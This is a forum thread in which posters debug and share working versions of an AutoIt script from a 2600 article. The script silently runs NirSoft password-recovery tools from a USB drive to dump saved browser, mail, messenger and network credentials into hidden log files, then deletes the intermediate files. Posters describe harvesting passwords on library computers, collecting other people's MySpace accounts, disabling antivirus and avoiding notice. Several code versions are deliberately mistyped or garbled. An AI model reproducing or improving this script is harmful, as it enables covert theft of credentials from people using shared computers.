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iPod Sneakiness


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Well then let’s see if I can get this out without sounding like a total n00b. Recently looking through the spring issue of 2600 I found this article “iPod Sneakiness†by Rob. Rob starts out by saying you can have some fun using your MP3 player a few small programs and his script to do so. Telling you to swing buy nirsoft to get the small programs and the fact that he used AutoIt (I have found out how to use this as an exe compiler.) he jumps right in. now to most or all of you that have been doing what ever it is you have been doing it may seem like nothing to do but to a Ubern00b like me I have no idea what the heck he is referring to, though I would like to learn. Now I know how to go get software but have no idea where to start after that. There seems to be a lot of language’s out there and some are easier then others but is there any one that I should look at to complete this script? I can post the section of the script that he put in the magazine if this would help more.

Sorry for the long breathless paragraph and,

thanks’ again.


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Well I will post the script that was in 2600 anyway.

Run(@ComSpec & ‘ /k “..PasswordSoftwarePSPV.exe /stext

..PasswordNewPSPV.txtâ€â€˜, @ScriptDir, @SW_HIDE)


Run(@ComSpec & ‘ /k “..PasswordSoftwareIM.exe /stext

..PasswordNewnetpass.txtâ€â€˜, @ScriptDir, @SW_HIDE)


Run(@ComSpec & ‘ /k “..PasswordSoftwhareMail.exe /stext

..PasswordNewmspass.txtâ€â€˜, @ScriptDir, @SW_HIDE)


Run(@ComSpec & ‘ /k “..PasswordSoftwhareNetwork.exe /stext

..PasswordNewmailpv.txtâ€â€˜, @ScriptDir, @SW_HIDE)


Run(@ComSpec & ‘ /k “COPY ..PasswordNew*.text ..PasswordNewall.txtâ€â€˜,


Dim $DateTime, $Location, $FileName $DateTime = @Year & “-†& @MON & “-†MDAY & ††& @HOUR & “-†& @MIN &

“-†& @SEC

$Location = @WorkingDir & ‘New’

$FileName = “all.txtâ€

FileMove($Location & $FileName , $Location &$DateTime & “.logâ€,1)


Run(@ComSpec & ‘ /k “del ..PasswordNew*.textâ€â€˜, @ScriptDir, @SW_HIDE)


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It all stand´s in 2600 what you have to do.

I also have some problems with the script, but i have edited the script in 2600 a little bit, but still there´s something wrong.

When i start the .exe file with the script a Error message appears. "Error: Error parsing function call."

What´s wrong?

Run(@ComSpec & ' /k "..PasswordSoftwarePSPV.exe /stext..PasswordNewPSPV.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSoftwareIM.exe /stext..PasswordNewIM.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSoftwareMail.exe /stext..PasswordNewMail.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSoftwareNetwork.exe /stext..PasswordNewNetwork.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "COPY..PasswordNew*.txt ..PasswordNewall.txt"',


Dim $DateTime, $Location, $FileName

$DateTime = @YEAR & "-" & @MON & "-" & @MDAY & " " & @HOUR & "-" & @MIN & "-" & @SEC

$Location = @WorkingDir & 'new'

$Filename = "all.txt"

FileMove($Location & $Filename , $Location & $DateTime & ".log",1)


Run(@ComSpec & ' {k "del ..PasswordNew*.txt"', @ScriptDir, @SW_HIDE)


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Yeah this code doesnt seem to work on either AutoIt v3 or v2. The pop up error message tells you where the code fails, but I don't know enough about AutoIt (yet) to fix it.

Sometimes characters in the code come out wrong when the magazine gets printed, and the code isn't in the code bank on 2600.net yet. Soon hopefully.

Any assistance would be great.

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Well, 48 hours ago I had never read 2600 or had ANY experience whatsoever with this script. A friend of mine just bought the issue of 2600 with that code in it and I found it intriguing. After a few downloads I had all I needed.....then I found the code had problems. I set on learning how to fix it myself. Now, approximately 40 hours after seeing the article I have found the problems and am working the script perfectly well, my persistance paid off. Well, enough rambling, here's the code.

As you may notice I had to change the sleep times. That was merely because my processor is WAY too slow. Feel free to mess with the sleep times yourselves, good luck.

Run(@ComSpec & ' /k "..PasswordSoftwarepspv.exe /stext ..Passwordnewpspv.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSofwareim.exe /stext ..Passwordnewim.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSofwaremail.exe /stext ..Passwordnewmail.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "..PasswordSofwarenetwork.exe /stext ..Passwordnewnetwork.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "COPY ..Passwordnew*.txt ..Passwordnewall.txt"', @ScriptDir, @SW_HIDE)


Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC

Dim $Location = @WorkingDir & 'new'

Dim $FileName = "all.txt"

FileMove($Location & $FileName , $Location & $DateTime & ".log",1)


Run(@ComSpec & ' /k "del ..Passwordnew*.txt"', @ScriptDir, @SW_HIDE)


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I don't know. I'm running the code you posted cause when I tried to correct the one in 2600, I failed miserably.

Anyways, I don't get a log file or even when I get rid of the command to delete, I don't get text files. Would like more info please.[/code]

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I tried their original code and it didn't work well for me but either did yours.

Is /k refering to the drive letter?

And in your code, Software changes to Sofware in later lines.

I am getting this error, while trying to run it from Drive K:

Error 3: The system cannot find path specified

Is this because of your double slashes?

When I run it from the desktop, I get no error or logs, I have my directories named properly and the .exes in the right place.


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Ok i get it.

You need to have a the software installed in ".,/password/software" or rather, one level up from your script.

Check the filenames in the script... im.exe might need to be mspass.exe etc.. all but one needed to be changed for me.

And delete the last chunk of code.

Works great, except for the Time stamp, which doesn't work at all.

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Instructions shoud tell you where to unzip the files, but whatever.

Just found out that Avast virus program prevents some of the .exe's from running. Avast must be shut down for it to work.

Yeah, I think nirsoft mentioned something about a couple of the programs being recognized as viruses by most virus scanners.

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Well this code definately works. I tried it out at my local library with some terrific results :)

One problem:

For some reason after you run the script exe, you can no longer Safely Remove Device. You must restart the computer, wich sucks because it draws attention to yourself, plus you might need an administrator password to continue reusing the computer.

Anyone know how to stop this from happening?

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I was having trouble with all the variations posted before so I edited it a bit further to get it to work:

Run(@ComSpec & ' /k "pspv.exe /stext .takepspv.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "mspass.exe /stext .takemspass.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "mailpv.exe /stext .takemailpv.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "netpass.exe /stext .takenetpass.txt"', @ScriptDir, @SW_HIDE)


Run(@ComSpec & ' /k "COPY .take*.txt .takeall.txt"', @ScriptDir, @SW_HIDE)


Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC

Dim $Location = @WorkingDir & '.take'

Dim $FileName = "all.txt"

FileMove($Location & $FileName , $Location & $DateTime & ".log",1)


Run(@ComSpec & ' /k "del .take*.txt"', @ScriptDir, @SW_HIDE)


The script/compiled exe must be in the same directory as the programs, along with a directory called "take", as in what ends up here is the take from your fishing expedition.

Be advised that at least one virus scanner, AVG, detects this stuff. I'll soon find out if the enterprise edition of Norton does as well.

I too am no longer to use the saftly remove device thing after running this, but as far as I can tell as long as nothing is being read/written to your usb drive you can pull it without somehting bad happening.

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Be advised that at least one virus scanner, AVG, detects this stuff. I'll soon find out if the enterprise edition of Norton does as well.

I too am no longer to use the saftly remove device thing after running this, but as far as I can tell as long as nothing is being read/written to your usb drive you can pull it without somehting bad happening.

Norton does, I believe, detect some of the programs run in the script. or ateast pspv, which comes up as a "Hacker Tool" pretty often.

This is a neat little script and I've used it on myself to get forgotten or inconveniently recorded passwords of mine. Also, it grabs multiple myspace accounts if ran on a loaded machine. :)

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Great work on the script guys, the one as printed in 2600 was practically useless. I was able to get m4gnesium's version of the code to work great. I have also found the reason you cannot safely remove the hardware afterwords as well. If you bring up tast manager, you will see that the script leaves about six instances of cmd.exe running. End those process and you can remove it. I am a scripting newbie, is there any way to add that into the script?

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